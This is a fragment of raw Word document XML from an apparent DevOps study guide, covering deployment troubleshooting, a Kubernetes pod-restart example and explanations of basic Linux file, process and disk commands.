            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61E9FFA8"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Infra slow (e.g., AWS/GCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6901CB70"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heck disk/network IOPS; consider better instance types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="32E19C11" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1626DEFC"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DB migrations taking time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C451FCB"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Optimize Liquibase/Flyway; avoid heavy DDL changes in live traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="142D129E" w14:textId="77777777" w:rsidR="001D4AC3"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354FB3">
          <v:rect id="_x0000_i3656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FF418" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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Example Scenario: Kubernetes Deployment Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3F523"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roblem</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pod restart keeps failing during deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D0374E"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Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E65AEB"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heck pod logs: kubectl logs &lt;pod&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AA9F6"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djust readinessProbe and livenessProbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27970BE0"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Monitor pod: kubectl describe pod &lt;pod&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF4B1E"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Fix application to respond faster (avoid blocking code at startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1A753" w14:textId="77777777" w:rsidR="001D4AC3"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E3F7991">
          <v:rect id="_x0000_i3657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DCE46F" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33344287"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Always </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitor logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and metrics during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E90477"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D37BF"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rolling updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67309797" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00617E2C" w:rsidRDefault="001D4AC3"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 xml:space="preserve">Maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deployment scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Git for traceability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0CEAD" w14:textId="0D8EDDAB" w:rsidR="00B66F22" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B66F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1335AF32">
          <v:rect id="_x0000_i3658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B52DCE" w14:textId="77777777" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEDF86" w14:textId="32D0F783" w:rsidR="00735B9A" w:rsidRPr="00CE4B95" w:rsidRDefault="00735B9A" w:rsidP="00735B9A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="907" w:name="_Toc196308387"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="907"/>
    </w:p>
    <w:p w14:paraId="2AD80FBB" w14:textId="77777777" w:rsidR="002B15DE" w:rsidRPr="00CE4B95" w:rsidRDefault="002B15DE" w:rsidP="002B15DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5F1D79" w14:textId="4F94399A" w:rsidR="005F7378" w:rsidRPr="00CE4B95" w:rsidRDefault="001072AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="908" w:name="_Toc196308388"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Linux commands</w:t>
      </w:r>
      <w:r w:rsidR="005F7378" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="908"/>
    </w:p>
    <w:p w14:paraId="0AAE2C19" w14:textId="4718B5B3" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Linux commands are used to interact with the Linux operating system and perform various tasks like file manipulation, system monitoring, networking, and process management. Here’s a detailed explanation of some commonly used Linux commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE78D2" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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1. File and Directory Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE03E8"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ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists files and directories in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78992D"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ls            # List files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6699082C"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ls -l         # Detailed list (permissions, size, date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB5C00"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ls -a         # List all files including hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55652193"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5D960"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d /home/user       # Change to the specified directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830EA99"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d ..               # Go up one level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4EEAA"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d ~                # Go to home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64A5A1"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wd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prints the current working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79330254"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pwd        # Shows the current directory path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED3F7C"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mkdir</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a new directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA95257"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mkdir newdir   # Create a directory named 'newdir'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8825C"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rmdir</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes an empty directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DEA72"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rmdir directory_name  # Removes a directory if it's empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13580E41"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rm</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34278A3D"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rm file.txt        # Removes a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF0998"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rm -r folder_name  # Removes a directory and its contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4FF857"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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Copies files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6FFA4"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p source.txt destination.txt       # Copy a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0ED8"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p -r source_dir destination_dir    # Copy a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D84D43"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mv</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Moves or renames files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918C02F"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mv old_name.txt new_name.txt       # Rename a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591916E"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mv file.txt /home/user/            # Move file to another directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85184F"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touch</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates an empty file or updates the timestamp of an existing file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39023F07"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ouch file.txt        # Creates or updates file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638CF74" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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2. File Viewing and Editing Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B5BCC"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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the content of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D85F6"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at file.txt         # View content of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11891B17"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less</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows scrolling through file contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E10A56"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less file.txt        # View file content one screen at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B565BEE"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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the first few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11BFBC"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head file.txt        # Default shows first 10 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F555F5"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head -n 20 file.txt  # Show first 20 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF567F"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tail</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the last few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D60C58"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ail file.txt        # Default shows last 10 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA46D61"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ail -n 20 file.txt  # Show last 20 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504DACF"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nano</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vi</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Opens a text editor to modify files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B165C"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nano file.txt        # Open file in Nano editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5951F"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vi file.txt          # Open file in Vi editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056ADF6" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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3. Process Management Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C9F30"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays information about running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453F910"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ps              # Show processes running in the current terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486A1C4"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ps aux          # Show all running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8DCED"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top</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays a dynamic real-time view of the system's processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454072B3"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op             # Show real-time process statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D0794"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kill</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends a signal to terminate a process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98AEB4"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kill 1234       # Terminate process with PID 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73057D"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lastRenderedPageBreak/>
        <w:t>kill -9 1234    # Force terminate the process with PID 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A63492"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killall</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Terminates all processes by name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BACAA"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killall firefox # Kill all processes with the name 'firefox'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295BD79E"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bg</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resumes a job in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B846B"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bg               # Resume job in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3C34F"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fg</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Brings a job to the foreground.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0728574A"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fg               # Bring a background job to the foreground</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A95E17" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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4. System Monitoring Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B78A3"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df</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows disk space usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069FEEB8"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df               # Display disk space usage for all mounted filesystems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095B2BB"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df -h            # Display disk space in human-readable format (e.g., GB, MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F67804"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du</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows disk usage for files and directories.</w:t>
      </w:r>
    </w:p>
